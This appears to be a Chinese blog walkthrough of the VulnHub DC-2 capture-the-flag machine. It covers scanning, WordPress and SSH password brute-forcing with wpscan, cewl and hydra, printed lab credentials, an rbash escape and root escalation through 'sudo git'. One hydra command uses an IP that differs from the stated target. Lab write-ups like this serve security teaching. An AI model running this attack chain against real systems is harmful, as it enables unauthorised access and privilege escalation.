vulnhub DC-2 靶机渗透

准备:

环境:vmware15.5以上(我用的是16.0的)

攻击机:kali 2019以上(2021)

靶机:DC-2

靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/

 

靶机ip:192.168.184.1

攻击机ip:  192.168.184.26

 

下载、安装及网络设置 请参考之前发布的dc-1的   太懒了不想敲 ~ ~

 

一、信息收集

1、老样子 先查看自己攻击的IP 来确定网段

ipconfig

一般kali ip是不动的   一直在变化的是目标的ip

 

2、扫描网段内的存活主机

arp-scan -l 

arp-scan 也可以扫描存活主机 上期nmap也可以

 

访问一下看看

发现通过ip访问失败  原因可能有两种  一个可能是网络配置的问题   一个可能要配置本地dns解析才能访问

 

3、不急我们先扫描一下端口和服务

nmap -T4 -A 192.168.184.1 -p- -oN c1.txt

-p- 等同于 -p 1-65535 都是扫描全部端口

-oN 扫描结果另存为xxx文件(文件保存在root目录底下)

 

ls

这里就 不看了

(PS:这个又什么用? 后期写渗透测试报告可以用到 文件可以用vmtools直接移出来 或者通过Bitvise SSH Client 移出来)

 

不多bb了,我们来分析

1、它开了80端口   http服务  

2、它开了7744端口     ssh服务    ssh登入口令爆破        (他吧ssh默认端口(22)改了还是有点防范意识的)

3.域名:http://dc-2/

 

怎么通过IP来访问它?

4、配置本地dns解析 hosts文件

hosts 文件: 定义IP地址和主机名的映射关系,是一个映射IP地址和主机名的规定。 将一些常用的网址域名对应的 IP 地址记录,加快域名解析、屏蔽网站等

用记事本打开 在结尾添加 IP  域名    我这里IP是192.168.184.1 那我应该填 192.168.184.1 dc-2

 

windows

hosts文件地址:C:\Windows\System32\drivers\etc\hosts

注:更改hosts文件必须是administrator用户!!!!   普通用户默认是没有权限的!!!!!

 

kali

hosts文件地址:/etc/hosts

vim/etc/hosts

按e

进入后按 i 就可以编辑了

保存:先按Esc键 然后 输入:wq 回车即可

 

 

 然后我们再来访问

这里输域名和IP是都能访问的

 

flag1在这

flag1:

你通常的词表可能不起作用,所以,也许你只需要成为cewl。

密码越多越好,但有时你不可能赢得所有密码。

作为一个登录以查看下一个标志。

如果找不到,请以其他用户身份登录。

 

 

5、敏感目录扫描

 nikto -h 192.168.184.1

nikto 敏感目录扫描工具

找到网页后台登入页面   它用的是 wordpress 框架

 

去访问看看

http://dc-2/wp-login.php

 

6、扫描该网站存在的用户名

wpscan --url dc-2 -e u

wpscan  Wordpress的专用扫描器 

扫到3个wordpress的用户:admin jerry tom

 

7、搜集可能的密码

cewl dc-2 -w pass.txt 

ls

cat pass.txt

cewl  密码字典生成器

-w 文件名:将结果写入文件中

 

8、在root文件夹下创建一个username.txt

内容为:admin jerry tom

 

9、破解wp用户名密码

wpscan --url dc-2 -U username.txt -P pass.txt

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

 

10、随便选一组登一下

flag2在这里:

如果你不能利用WordPress并走捷径,还有另一种方法。

希望你能找到另一个切入点。

 

 

11、破解ssh

hydra -L username.txt -P pass.txt 172.20.10.10 ssh -s 7744

login: tom   password: parturient

 

12、ssh登入

ssh tom@192.168.184.1 -p 7744 

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

parturient

 

13、登入后还是老样子 查看权限、敏感目录下的文件、用户目录下的文件

发现他对用户权限做了限制(-rbash)

 

14、看看自己命令行在哪

echo $PATH

 

15、查看自己可以用什么命令

ls usr/bin

发现可以使用 vi编辑器

 

16、使用vi编辑器 打开flag3.txt

vi flag3.txt

注:退出不要点 x 输入:q 不保存且退出

 

17、更具提示切换jerry用户

su jerry

使用 su jerry 发现 su 被 rbash

 

18、rbash绕过

BASH_CMDS[a]=/bin/sh

a

/bin/bash

命令的意思:按下键盘a就可以调用/bin/sh命令行

发现cat还是用不了

 

export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin

把高级权限的命令行也加到自己的环境变量里

 

19、切换用户

su jerry

adipiscing

 

20.回到自己的home目录

cd ~

ls

 cat flag4.txt

 

21、查看可以以root权限使用什么命令

sudo -l

发现 git

 

22、git提权

方法一:

sudo git help config

进来之后输入

!/bin/sh

查看权限

提权成功

 

方法二:

sudo git -p --help

直接输入!whoami

注:之后的每一条命令前面都要加上! 比如!ls

 

 

23、回到根目录 找最后一个flag

 

 

到这就结束了~

蟹蟹曾郡老师以及帮助过我的人~

不定期更新,感觉很有料关注一下呗~~~

求三连~~~~谢谢~

 

posted @ 2021-11-09 07:56  弹个shell?  阅读(116)  评论(0)    收藏  举报